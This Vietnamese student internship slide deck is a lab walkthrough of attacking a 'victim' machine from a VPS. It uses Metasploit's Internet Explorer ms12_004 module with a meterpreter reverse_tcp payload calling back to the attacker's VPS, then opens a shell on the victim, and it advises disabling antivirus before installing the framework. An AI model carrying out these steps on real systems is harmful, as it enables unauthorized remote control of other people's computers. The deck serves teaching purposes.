1. Đề tài: System Hacking
Sinh viên:
Trần Văn Vịnh
Nguyễn Minh Tiến
2. Mục tiêu:
Thực hiện tấn công máy Victeam thông qua máy chủ ảo VPS.
Nội dung:
- Cài đặt Metasploit Framework trên VPS.
- Khai thác lỗi Internet Explorer thông qua VPS (ms12_004).
- Khai thác lỗi Microsoft Word MS12_027 qua VPS.
- Demo lỗi.
- Cảm nhận và kinh nghiệm rút ra sau kì thực tập.
3. I. Setup MSF trên
VPS
Bước 1 : Truy cập vào VPS bằng Remote Desktop
Connection
4. Bước 2 : Download và cài đặt MSF trên VPS qua trang
chủ: http://www.metasploit.com
I. Setup MSF trên
VPS
5. Sau khi tải về ta chạy file setup đúng với HDH của VPS.
Lưu ý : Tắt các chương trình diệt virus và firewall trước khi cài .
Kết quả khi hoàn thành cài đặt
I. Setup MSF trên
VPS
6. II. Khai thác lỗi Internet Explorer
ms12_004
Đầu tiên ta đăng nhập vào máy chủ ảo VPS và chạy
MSF
7. Gõ search ms12_024 để tìm mã lỗi
II. Khai thác lỗi Internet Explorer
ms12_004
9. Set payload windows/meterpreter/reverse_tcp
II. Khai thác lỗi Internet Explorer
ms12_004
10. Set srvhost và lhost = “ ip của máy tấn công “.
(ở đây là ip của máy chủ ảo VPS)
II. Khai thác lỗi Internet Explorer
ms12_004
11. Set uripath =” đường dẫn “ .
II. Khai thác lỗi Internet Explorer
ms12_004
12. Và exploit để khởi động server
II. Khai thác lỗi Internet Explorer
ms12_004
13. Lấy máy nạn nhân truy cập vào đường dẫn mà ta đã tạo
ra
II. Khai thác lỗi Internet Explorer
ms12_004
14. Sau một khoảng thời gian => Xâm nhập thành công
máy nạn nhân .
II. Khai thác lỗi Internet Explorer
ms12_004
15. Dùng lệnh sessions –I “ id của session muốn vào “ để thực hiện tấn
công .
Lệnh sysinfo để xem thông tin máy và lệnh shell để điều khiển cmd
của máy nạn nhân .
II. Khai thác lỗi Internet Explorer
ms12_004
16. III. Khai thác lỗi Office
word MS12_027
Demo chương trình:
https://www.youtube.com/watch?v=IH11i482w5o
17. IV. Cảm nhận và kinh nghiệm
rút ra sau kì thực tập
Bổ ích và lý
thú
Cảm nhận
Đem lại nhiều
kinh nghiệm
Môi trường
làm việc thân
thiện
Thầy cô tận
tình với SV
18. Kinh nghiệm rút ra:
- Làm việc theo nhóm giúp hoàn thành công việc hiệu quả và
dễ dàng hơn.
- Nâng cao được khả năng tìm hiểu, chọn lọc thông tin cần
thiết đối với đề tài của mình.
- Nâng cao khả năng làm việc độc lập, biết cách tư duy
chín chắn để có thể tự khắc phục 1 số lỗi cần thiết.
IV. Cảm nhận và kinh nghiệm
rút ra sau kì thực tập